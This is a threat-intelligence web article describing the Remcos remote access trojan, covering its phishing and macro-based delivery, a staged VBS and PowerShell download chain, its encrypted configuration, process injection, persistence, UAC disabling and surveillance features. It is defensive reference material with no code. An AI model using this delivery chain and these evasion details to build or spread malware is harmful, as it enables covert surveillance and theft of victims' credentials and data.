Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

Remcos (RAT) – Malware

June 30, 2023
Reading Time: 4 mins read
in Malware, Types of Malware
Name Remcos
Type of Malware RAT
Date of Initial Activity 2016
Associated Groups Gorgon Group, LazyScripter
Motivation Run keyloggers and surveillance (audio + screenshots) mode to steal accounts, sentitive information, and cryptocurrencies, and Follow-On Infections
Attack Vectors Phishing emails, Infected email attachments (PDFs and Office documents),
Targeted System Windows

Overview

Remcos is a RAT that first appeared in the wild in 2016. Remcos distributes itself through malicious Microsoft Office documents, which are attached to SPAM emails, and is designed to bypass Microsoft Windowss UAC security and execute malware with high-level privileges.

The Remcos malware is actually a legitimate tool sold by a German Company named Breaking Security under the name Remote Control and Surveillance and is commonly abused by hackers.

Targets

Targets Regular Users.

Tools/ Techniques Used

After infecting a computer, Remcos provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos is commonly deployed via a phishing attack. The malware may be embedded in a malicious ZIP file masquerading as a PDF that claims to contain an invoice or order. Alternatively, the malware has also been deployed using Microsoft Office documents and malicious macros that unpack and deploy the malware.

To evade detection, Remcos uses process injection or process hollowing, which enables it to run inside a legitimate process. The malware also deploys persistence mechanisms and runs in the background to hide from users. As a RAT, command and control (C2) is a core capability of Remcos malware. The malicious traffic is encrypted en route to the C2 server, and the attacker uses Distributed DNS to create a variety of domains for C2 servers.

This makes it possible for the malware to defeat protections that rely on filtering traffic to known malicious domains. Once the attached Excel document is opened in the Excel program, it asks for a password to view the document, which has already been provided in the email. Because the file contains Macro code, it shows a yellow security warning bar to warn the victim of the danger. The file message lures the victim into clicking the Enable Content button to bypass the warning and execute the malicious macro code.

The macro has a function called “Wookbook_Active()” that is called automatically when it opens. Its task is to extract VBS code from the cells into a file “%AppData%\HobYQ.vbs” and then execute it. To protect the Remcos payload file, it uses a super sophisticated way to download it.

In this way, it executes both VBS and PowerShell script codes. “HobYQ.vbs” runs a segment of dynamically spliced PowerShell code to download another VBS file (“flip.vbs”) from the attacker’s server and run it. Next, “flip.vbs” continues to download a file (called “mem.txt”) from the server, which is a piece of encoded VBS code that will be executed later in “flip.vbs” to download the final file from the same server, which is called “faze.jpg”.

Every Remcos contains an RC4 encrypted configuration block in its PE resource section, named “SETTINGS” as shown in Figure 8, where the first byte “B1” is the size of the following RC4 key that is in a red box and the rest data is the encrypted Remcos configuration block.

The first thing Remcos does is to decrypt the configuration block, which will be referred to throughout Remcos lifetime. It contains but not limited to the C2’s server information, Remcos assigned name for attacker to recognize the victim, Remcos sub-key name in registry, the name of log file for recording victim’s keylogger and clipboard data, many flags telling Remcos how to start its features in the victim’s device, as well as the authentication data used to establish connection to the C2 server.

The workflow of Remcos is very clear that it starts many threads to perform auto-start work according to the flags defined in the configuration block. It includes: Adding Remcos to the auto-run group in the system registry Starting a watchdog program (Remcos’ daemon program) Recording the victim’s audio input from an input device ( microphone) Capturing victim’s screenshots at startup Disabling UAC (User Account Control) on the victim’s device.

Remcos Malware Capabilities

The Remcos malware is actually a legitimate tool sold by a German Company named Breaking Security under the name Remote Control and Surveillance and is commonly abused by hackers. Some of the key capabilities of the malware include:

  • Privilege Elevation: Remcos can gain Administrator permissions on an infected system and disable User Account Control (UAC). This makes it easier for the attacker to execute malicious functionality.
  • Defense Evasion: Remcos uses process injection to embed itself within legitimate processes, making it more difficult for antivirus to detect. Additionally, the malware can run in the background to hide itself from users.
  • Data Collection: One of the core capabilities of the Remcos malware is to collect information about the user of a computer. It can log keystrokes, capture screenshots, audio, and clipboard contents, and collect passwords from the infected system.

Impact / Significant Attacks

Operation Spalax.

References

  1. Remcos Malware
  2. Remcos
  3. The Latest Remcos RAT Driven By Phishing Campaign
Tags: CyberattackCybersecurityGorgon GroupLazyScripterMalwaremalware namePhishingPhishing EmailsRATRemcosVulnerabilitiesWindows
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
SilentSelfie (Infostealer) – Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025

Latest Alerts

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Google Patches Chrome Account Takeover Bug

Horabot Malware Targets LatAm Via Phishing

HTTPBot DDoS Threat To Windows Systems

Subscribe to our newsletter

    Latest Incidents

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    Dior Breach Exposes Asian Customer Data

    Australian Human Rights Body Files Leaked

    Nucor Cyberattack Halts Plants Networks

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial